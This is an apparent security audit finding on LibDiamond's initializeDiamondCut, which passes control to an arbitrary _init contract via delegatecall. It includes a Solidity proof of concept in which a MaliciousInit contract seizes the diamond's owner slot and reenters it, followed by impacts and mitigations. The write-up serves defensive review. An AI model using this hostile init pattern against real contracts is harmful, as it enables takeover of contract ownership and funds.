The initializeDiamondCut function in the LibDiamond library uses delegatecall to execute initialization code on a target contract (_init). Because delegatecall runs the target's code in the diamond's own storage and address context, a malicious _init contract gains full write access to the diamond's storage and can also reenter the diamond while the cut is still in progress, before initialization is complete.
The initializeDiamondCut function is an internal function within LibDiamond, so it is compiled into any contract that uses the library; in the EIP-2535 reference implementation it is reached through the owner-gated diamondCut function. The function uses delegatecall to execute the initialization code specified in _calldata on the _init contract.

Under delegatecall, msg.sender, address(this) and storage all remain the diamond's. If the _init contract is malicious, it does not need any further access: it can write arbitrary storage slots directly (including the contract owner and the selector-to-facet mappings), and because address(this) is the diamond, any external call it makes back to that address reenters the diamond during the execution of delegatecall, potentially manipulating the diamond's state before it is fully initialized.
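The following is an added illustration, not code from LibDiamond or the audited project. It models the initializeDiamondCut pattern with a minimal diamond and a hostile _init contract; the contract and library names, the owner-only diamondCut model and the storage layout are assumptions made for the example.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Added example, not LibDiamond's own code. It mirrors the shape of
// initializeDiamondCut to show what a delegatecalled _init can do.
library LibDiamondModel {
    // Assumed namespaced storage slot, in the style of LibDiamond.
    bytes32 constant DIAMOND_STORAGE_POSITION =
        keccak256("diamond.standard.diamond.storage");

    struct DiamondStorage {
        address contractOwner;
        // A reentrancy flag would live here too, and would be just as
        // writable by a delegatecalled _init as contractOwner is.
    }

    function diamondStorage() internal pure returns (DiamondStorage storage ds) {
        bytes32 position = DIAMOND_STORAGE_POSITION;
        assembly { ds.slot := position }
    }

    function enforceIsContractOwner() internal view {
        require(msg.sender == diamondStorage().contractOwner, "not owner");
    }

    // Same pattern as LibDiamond.initializeDiamondCut: _init's code runs
    // in the diamond's storage context via delegatecall.
    function initializeDiamondCut(address _init, bytes memory _calldata) internal {
        if (_init == address(0)) return;
        require(_init.code.length > 0, "_init has no code");
        (bool success, bytes memory err) = _init.delegatecall(_calldata);
        if (!success) {
            if (err.length > 0) {
                // bubble up the revert reason from _init
                assembly { revert(add(32, err), mload(err)) }
            }
            revert("init reverted");
        }
    }
}

contract DiamondModel {
    constructor() {
        LibDiamondModel.diamondStorage().contractOwner = msg.sender;
    }

    function owner() external view returns (address) {
        return LibDiamondModel.diamondStorage().contractOwner;
    }

    // Model of diamondCut: the owner check is the only thing standing
    // between an arbitrary _init and full control of the diamond's storage.
    function diamondCut(address _init, bytes calldata _calldata) external {
        LibDiamondModel.enforceIsContractOwner();
        LibDiamondModel.initializeDiamondCut(_init, _calldata);
    }
}

// Hostile _init. Under delegatecall, storage and address(this) are the diamond's.
contract MaliciousInit {
    address immutable attacker;

    constructor(address _attacker) { attacker = _attacker; }

    function init() external {
        // 1. No reentrancy required: overwrite the diamond's owner slot directly.
        LibDiamondModel.diamondStorage().contractOwner = attacker;

        // 2. Reentrancy is also available: address(this) is the diamond, so this
        //    external call reenters it while diamondCut is still executing.
        (bool ok, ) = address(this).call(abi.encodeWithSignature("owner()"));
        require(ok, "reentrant call failed");
    }
}
```

Deploying DiamondModel, then calling diamondCut with the MaliciousInit address and abi.encodeWithSignature("init()") leaves owner() returning the attacker address. The example also shows why a storage-based guard is not sufficient on its own: the init code that would be guarded is the same code that can clear the flag.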
A successful exploitation of this vulnerability could lead to:
Incorrect State Variables: The attacker could manipulate the diamond's state variables (for example the contract owner or the selector-to-facet mappings) before they are finalized, leading to unexpected and potentially harmful behavior.
Unauthorized Access: The attacker could gain unauthorized access to sensitive functions or data within the diamond contract.
Denial of Service: The diamond contract could be rendered unusable due to the corrupted state.
Manual Code Review
Reentrancy Guard: Implement a reentrancy guard pattern around the initializeDiamondCut call. A simple boolean flag can be used to prevent the diamond from being reentered while initialization is in progress. Note that a flag kept in the diamond's storage is itself writable by the delegatecalled _init code, so the guard limits accidental reentrancy but cannot by itself stop a malicious _init.
Careful Review of _init Contracts: Treat any contract passed as the _init argument as fully trusted code running inside the diamond. Keep diamondCut restricted to the contract owner, prefer a fixed, audited initializer contract over arbitrary addresses, and thoroughly audit any _init contract to ensure it does not contain malicious code or reentrancy vulnerabilities.